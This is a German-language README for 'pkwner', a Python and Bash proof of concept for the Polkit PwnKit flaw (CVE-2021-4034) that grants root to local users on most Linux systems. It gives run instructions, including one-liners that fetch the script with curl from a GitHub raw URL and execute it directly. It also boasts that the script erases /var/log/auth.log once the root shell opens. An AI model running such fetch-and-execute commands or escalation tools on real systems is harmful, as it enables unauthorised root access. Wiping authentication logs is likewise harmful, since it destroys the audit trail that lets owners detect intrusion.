
Ein Python3- und Bash-PoC für CVE-2021-4034 von Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Ein Python3- und ein BASH-PoC für CVE-2021-4034 von Kim Schulz
Dies ist ein einfacher PoC für den neu entdeckten Polkit-Fehler namens PwnKit.
Ich habe ihn sowohl als Bash- als auch als Python3-Skript erstellt – einfach aus Spaß an der Freude.
Das Problem ist sehr einfach auszunutzen, hat aber enorme Konsequenzen, da es auf den meisten Linux-Rechnern, auf denen der Angreifer lokalen Benutzerzugriff hat, problemlos Root-Zugriff gewährt.
Diese Skripte sind für die einmalige Ausführung gedacht, führen Sie also einfach Folgendes aus:
python3 pkwner.py
oder
bash pkwner.sh
Sie können es auch direkt von einem Webserver (z. B. diesem GitHub-Repository) ausführen über:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
oder
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In beiden Fällen sollte es ungefähr so aussehen:
und

Das Skript erstellt einige Dateien und Ordner, räumt aber nach sich selbst auf, sobald die Root-Shell geöffnet ist – es bereinigt sogar die /var/log/auth.log (warum auch nicht).